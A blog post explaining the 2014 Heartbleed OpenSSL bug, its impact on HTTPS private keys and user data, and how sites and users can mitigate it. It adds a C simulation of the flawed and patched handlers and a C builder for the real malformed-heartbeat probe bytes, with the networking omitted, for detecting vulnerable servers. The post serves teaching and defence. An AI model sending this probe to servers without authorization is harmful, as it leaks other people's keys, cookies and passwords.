Meet Heartbleed: The Huge New Security Flaw for Secure Websites
Posted on April 15th 2014
Security researchers have disclosed a serious new vulnerability in OpenSSL, nicknamed the Heartbleed Bug (CVE-2014-0160), that lets an attacker read memory from secure websites running the affected versions of the library, OpenSSL 1.0.1 through 1.0.1f.
The bug lets an attacker read chunks of a vulnerable web server's process memory, up to 64 KB per request, without authenticating and without leaving anything in the server's logs. That memory can hold the server's private key, other users' session cookies, and the usernames and passwords of people logging in at that moment. With the private key, an attacker can decrypt captured traffic from sessions that used RSA key exchange, and can impersonate the site.
A Quick Review of Secure Websites (HTTPS)
Online retailers and banks use HTTPS -- short for Hypertext Transfer Protocol Secure -- to secure messages sent and received by their websites. Have you ever seen a small lock symbol next to the URL of a website? This indicates that the website’s traffic is secured using HTTPS.
The technology behind HTTPS is TLS, Transport Layer Security, the successor of SSL, Secure Sockets Layer; the older name is still widely used, and this post uses both. TLS/SSL sets up an encrypted connection between the website and your browser that is supposed to ensure two things: that the site is who it claims to be, and that everything exchanged stays private.
The website proves its identity with a digital certificate, which binds its name to a public key, and with the matching private key, which must never leave the server. During the handshake the two sides agree on fresh session keys that encrypt the rest of the conversation, so an eavesdropper who captures the traffic sees only ciphertext. With the server's private key, however, the eavesdropper can recover the session keys of any connection that used RSA key exchange (still the most common configuration at the time) and read those conversations, including ones recorded long before the key was stolen. Connections that used ephemeral Diffie-Hellman cipher suites (DHE or ECDHE, which provide forward secrecy) cannot be decrypted this way, although the attacker can still impersonate the site.
OpenSSL and Heartbleed
OpenSSL is an open source library that a large share of web servers use for TLS/SSL. The TLS heartbeat extension (RFC 6520) lets either side send a small keep-alive message that the other side must echo back; the sender includes a payload and a field stating the payload's length. Due to a missing bounds check, OpenSSL 1.0.1 through 1.0.1f never compared that stated length with the number of bytes actually received. An attacker can therefore send a heartbeat carrying a single byte of payload while claiming 64 KB, and the server copies 64 KB from the memory adjacent to the request into its reply. Repeating the request harvests a fresh slice of memory each time, and that memory can include the server's private key.
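As an added example that is not code from the original post or from OpenSSL itself, the following C program models the defect and its fix. It simulates the server's memory as one buffer in which a heartbeat request record is followed by a constructed stand-in for a private key, then runs the same request through a handler written in the shape of the vulnerable OpenSSL code and through one written in the shape of the 1.0.1g patch. The function names, the 256-byte memory model and the secret string are assumptions made for the demonstration; the real bug reads up to 64 KB of adjacent heap.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated process memory (an assumption of this example): a heartbeat
 * request record sits at the start of the buffer and is followed by other
 * data the server happens to hold, here a constructed stand-in for a key. */
#define MEM_SIZE    256
#define HB_REQUEST    1
#define HB_RESPONSE   2
#define HB_PADDING   16   /* RFC 6520 requires at least 16 bytes of padding */

static const char SECRET[] = "-----BEGIN RSA PRIVATE KEY----- (constructed)";

typedef int (*hb_handler)(const uint8_t *rec, size_t rec_len,
                          uint8_t *out, size_t *out_len);

/* Build a heartbeat request whose length field claims `claimed_len` payload
 * bytes while only `actual_len` payload bytes are really present.
 * Returns the length of the record as it actually arrived on the wire. */
size_t build_request(uint8_t *mem, uint16_t claimed_len, size_t actual_len)
{
    memset(mem, 0, MEM_SIZE);
    mem[0] = HB_REQUEST;
    mem[1] = (uint8_t)(claimed_len >> 8);
    mem[2] = (uint8_t)(claimed_len & 0xff);
    memset(mem + 3, 'A', actual_len);
    size_t rec_len = 3 + actual_len + HB_PADDING;
    memcpy(mem + rec_len, SECRET, sizeof SECRET);   /* bytes past the record */
    return rec_len;
}

/* Vulnerable handler, the shape of OpenSSL 1.0.1 to 1.0.1f: it trusts the
 * peer-supplied length and copies that many bytes starting at the payload. */
int heartbeat_vulnerable(const uint8_t *rec, size_t rec_len,
                         uint8_t *out, size_t *out_len)
{
    (void)rec_len;                               /* never consulted: the bug */
    uint16_t payload = (uint16_t)((rec[1] << 8) | rec[2]);
    out[0] = HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload);           /* reads past the record */
    *out_len = 3 + payload + HB_PADDING;
    return 1;
}

/* Fixed handler, the shape of the 1.0.1g patch: drop the request unless the
 * claimed payload plus header and padding fits in the record that arrived. */
int heartbeat_fixed(const uint8_t *rec, size_t rec_len,
                    uint8_t *out, size_t *out_len)
{
    if (rec_len < 1 + 2 + HB_PADDING)
        return 0;                                /* too short even for an empty payload */
    uint16_t payload = (uint16_t)((rec[1] << 8) | rec[2]);
    if ((size_t)(1 + 2 + payload + HB_PADDING) > rec_len)
        return 0;                                /* silently discard, as the patch does */
    out[0] = HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload);
    *out_len = 3 + payload + HB_PADDING;
    return 1;
}

/* Send one request with 4 real payload bytes through `handler` and report:
 * -1 request dropped (or larger than the simulated memory), 0 response holds
 * no secret bytes, 1 the secret appears in the echoed payload. */
int probe_handler(hb_handler handler, uint16_t claimed_len)
{
    uint8_t mem[MEM_SIZE];
    uint8_t out[MEM_SIZE + 3 + HB_PADDING];
    size_t out_len = 0;
    if (claimed_len > MEM_SIZE - 3)
        return -1;
    size_t rec_len = build_request(mem, claimed_len, 4);
    if (!handler(mem, rec_len, out, &out_len))
        return -1;
    size_t secret_len = strlen(SECRET);
    for (size_t i = 3; i + secret_len <= 3 + (size_t)claimed_len; i++)
        if (memcmp(out + i, SECRET, secret_len) == 0)
            return 1;
    return 0;
}

int main(void)
{
    printf("vulnerable handler, claimed 128 bytes: %d\n", probe_handler(heartbeat_vulnerable, 128));
    printf("fixed handler, claimed 128 bytes:      %d\n", probe_handler(heartbeat_fixed, 128));
    printf("fixed handler, honest request:         %d\n", probe_handler(heartbeat_fixed, 4));
    return 0;
}
```

The only difference between the two handlers is the single length comparison, which is also essentially what the upstream fix added; everything the vulnerable version echoes beyond the four real payload bytes is whatever happened to sit next to the request in memory.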
This is a big deal. With the private key, an attacker can decrypt traffic to and from that server, including traffic captured in the past, for every connection that used RSA key exchange rather than a forward-secret cipher suite. That traffic can contain your login credentials and anything else you submitted, such as card details sent to an online retailer. The leaked memory is valuable even without the key: a single response can carry other users' session cookies and passwords in plaintext, because the server had just decrypted them.
The private key also lets the attacker impersonate the site. The certificate itself is public and proves nothing on its own; what makes it trustworthy is that only the real server can complete the handshake with the matching private key. An attacker who holds that key can stand up a fake site, present the genuine certificate, finish the handshake, and be shown with the padlock by your browser.
The worst part is that neither you nor the site can tell. The impersonating server presents a certificate that really is authentic, and the heartbeat requests that stole the key look like ordinary traffic.
What You Can Do to Mitigate the Risks
Luckily, not all versions of OpenSSL contain this flaw. The fix shipped in OpenSSL 1.0.1g on April 7, 2014, versions before 1.0.1 were never affected, and the publicity around this bug is driving a rapid wave of updates.
But the flaw sat unnoticed for about two years, and many websites still run vulnerable versions. A site that was exposed has to do three things: upgrade OpenSSL (or apply its Linux distribution's backported patch; a patched distribution package may still report a version string such as 1.0.1e, so the package changelog, not the version number, is what to check), generate new private keys and have new certificates issued, and revoke the old certificates. If you have an account with an affected site, change your password, but only once the site has patched and replaced its certificate: a new password sent to a server that is still vulnerable can be stolen just like the old one.
Unfortunately, there is no way to know whether anyone exploited the bug against a given site or stole your data, since the attack leaves no trace. It is best to assume the worst: once a site has patched, change its password, and change it as well on every other site where you used the same or a similar password, because reused credentials are the first thing attackers try elsewhere.
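Checking a server's version string is not a reliable test, because patched distribution packages often keep the old version number; the reliable test is to send the malformed heartbeat and see whether the server echoes memory. The following C code, an added example rather than anything from the original post or from OpenSSL, builds the two messages such a probe sends (a ClientHello that advertises the heartbeat extension, and the heartbeat request that claims a 16 KB payload it does not carry) and classifies the records a server sends back. The network part (opening a TCP connection, reading the server's handshake through ServerHelloDone, then sending the probe) is left out so the code runs offline against the constructed responses at the bottom; the function names, the verdict values and the constant random field are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* TLS record content types; the heartbeat extension is RFC 6520. */
#define REC_ALERT     0x15
#define REC_HANDSHAKE 0x16
#define REC_HEARTBEAT 0x18

enum verdict { NO_RESPONSE = 0, NOT_VULNERABLE = 1, VULNERABLE = 2 };

/* The probe record: heartbeat content type, TLS 1.1, record length 3, then a
 * heartbeat request (1) claiming a 0x4000-byte payload with no payload at all.
 * Returns the number of bytes written into buf (needs room for 8). */
size_t build_malformed_heartbeat(uint8_t *buf)
{
    const uint8_t rec[] = {REC_HEARTBEAT, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00};
    memcpy(buf, rec, sizeof rec);
    return sizeof rec;
}

/* A minimal TLS 1.1 ClientHello that advertises the heartbeat extension, so
 * the server will process heartbeat records. The random field is a constant
 * here (constructed); a real client fills it with 32 random bytes.
 * Returns the number of bytes written into buf (needs room for 64). */
size_t build_client_hello(uint8_t *buf)
{
    size_t n = 0;
    buf[n++] = REC_HANDSHAKE; buf[n++] = 0x03; buf[n++] = 0x02;
    buf[n++] = 0x00; buf[n++] = 0x00;                   /* record length, patched below */
    size_t hs = n;
    buf[n++] = 0x01;                                    /* HandshakeType client_hello */
    buf[n++] = 0x00; buf[n++] = 0x00; buf[n++] = 0x00;  /* handshake length, patched below */
    buf[n++] = 0x03; buf[n++] = 0x02;                   /* client_version TLS 1.1 */
    memset(buf + n, 0x42, 32); n += 32;                 /* random (constructed constant) */
    buf[n++] = 0x00;                                    /* session_id length 0 */
    buf[n++] = 0x00; buf[n++] = 0x04;                   /* cipher_suites length: two suites */
    buf[n++] = 0x00; buf[n++] = 0x2f;                   /* TLS_RSA_WITH_AES_128_CBC_SHA */
    buf[n++] = 0x00; buf[n++] = 0x35;                   /* TLS_RSA_WITH_AES_256_CBC_SHA */
    buf[n++] = 0x01; buf[n++] = 0x00;                   /* compression_methods: null */
    buf[n++] = 0x00; buf[n++] = 0x05;                   /* extensions length */
    buf[n++] = 0x00; buf[n++] = 0x0f;                   /* extension type: heartbeat */
    buf[n++] = 0x00; buf[n++] = 0x01;                   /* extension length */
    buf[n++] = 0x01;                                    /* peer_allowed_to_send */
    size_t hs_len = n - hs - 4;
    buf[hs + 1] = (uint8_t)(hs_len >> 16);
    buf[hs + 2] = (uint8_t)(hs_len >> 8);
    buf[hs + 3] = (uint8_t)hs_len;
    size_t rec_len = n - 5;
    buf[3] = (uint8_t)(rec_len >> 8);
    buf[4] = (uint8_t)rec_len;
    return n;
}

/* Walk the records the server returned after the malformed heartbeat. A
 * heartbeat record longer than the 3 bytes we sent can only have been filled
 * from the server's memory: vulnerable. An alert, or a heartbeat record of
 * the honest size, means the server's length check held. */
enum verdict classify_response(const uint8_t *data, size_t len)
{
    enum verdict v = NO_RESPONSE;
    size_t pos = 0;
    while (pos + 5 <= len) {
        uint8_t type = data[pos];
        size_t rlen = ((size_t)data[pos + 3] << 8) | data[pos + 4];
        if (type == REC_HEARTBEAT && rlen > 3)
            return VULNERABLE;      /* even a truncated capture of it proves the point */
        if (pos + 5 + rlen > len)
            break;                  /* truncated record, cannot parse further */
        if (type == REC_HEARTBEAT || type == REC_ALERT)
            v = NOT_VULNERABLE;
        pos += 5 + rlen;
    }
    return v;
}

/* Constructed server responses for offline use: a leaking server echoes the
 * claimed length 0x4000 and fills the reply from memory (trimmed to 16 bytes
 * here); a patched server answers with a fatal alert, or with nothing. */
static const uint8_t RESP_LEAKING[] = {
    REC_HEARTBEAT, 0x03, 0x02, 0x00, 0x13,
    0x02, 0x40, 0x00, 'A', 'A', 'A', 'A', 's', 'e', 'c', 'r', 'e', 't',
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
static const uint8_t RESP_PATCHED[] = {REC_ALERT, 0x03, 0x02, 0x00, 0x02, 0x02, 0x0a};

int main(void)
{
    uint8_t hello[64], probe[8];
    size_t hello_len = build_client_hello(hello);
    size_t probe_len = build_malformed_heartbeat(probe);
    printf("ClientHello: %zu bytes, heartbeat probe: %zu bytes\n", hello_len, probe_len);
    printf("leaking server: %d, patched server: %d, silence: %d\n",
           classify_response(RESP_LEAKING, sizeof RESP_LEAKING),
           classify_response(RESP_PATCHED, sizeof RESP_PATCHED),
           classify_response(RESP_PATCHED, 0));
    return 0;
}
```

Run against a live server, the probe must only be pointed at systems you are authorized to test, since a vulnerable server will hand back other people's data; treat a NO_RESPONSE verdict as inconclusive rather than safe, because a server that does not speak TLS 1.1, rejects the cipher suites offered here, or simply times out produces the same silence as a patched one.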